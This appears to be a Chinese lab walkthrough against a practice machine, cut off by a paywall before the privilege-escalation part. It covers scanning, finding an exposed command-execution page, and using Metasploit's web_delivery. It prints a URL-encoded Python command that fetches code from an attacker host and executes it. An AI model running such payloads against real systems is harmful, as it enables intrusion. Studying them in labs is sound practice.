注:这个靶机主要用来练习Linux提权,有超过12种的提权方法
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问
2.扫描端口,开启了80,22端口
nmap -n -p- -A 192.168.225.149 -o escalate.nmap
3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问:
dirb http://192.168.225.149 -X .php
4.提示:使用cmd可以直接执行命令
确实可以:
5.使用msf进行攻击:
use exploit/multi/script/web_delivery此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行(把webshell放在该端口下刚刚好)
6.设置服务端和本地地址都为攻击机ip,运行如下:
工具提示把这段代码发给靶机执行,也就是放在cmd后面执行
7.因为服务端会进行url解码,所以先将payload进行url编码,目前来看只能使用burpsuite中的url编码:
8.将编码进行命令执行:
http://192.168.225.149/shell.php?cmd=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%79%73%3b%69%6d%70%6f%72%74%20%73%73%6c%3b%75%3d%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%75%72%6c%6c%69%62%27%2b%7b%32%3a%27%27%2c%33%3a%27%2e%72%65%71%75%65%73%74%27%7d%5b%73%79%73%2e%76%65%72%73%69%6f%6e%5f%69%6e%66%6f%5b%30%5d%5d%2c%66%72%6f%6d%6c%69%73%74%3d%28%27%75%72%6c%6f%70%65%6e%27%2c%29%29%3b%72%3d%75%2e%75%72%6c%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%32%35%2e%31%33%33%3a%38%30%38%30%2f%4d%52%6a%53%77%32%54%64%38%48%47%27%2c%20%63%6f%6e%74%65%78%74%3d%73%73%6c%2e%5f%63%72%65%61%74%65%5f%75%6e%76%65%72%69%66%69%65%64%5f%63%6f%6e%74%65%78%74%28%29%29%3b%65%78%65%63%28%72%2e%72%65%61%64%28%29%29%3b%22
最低0.47元/天 解锁文章
扫一扫
2207
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
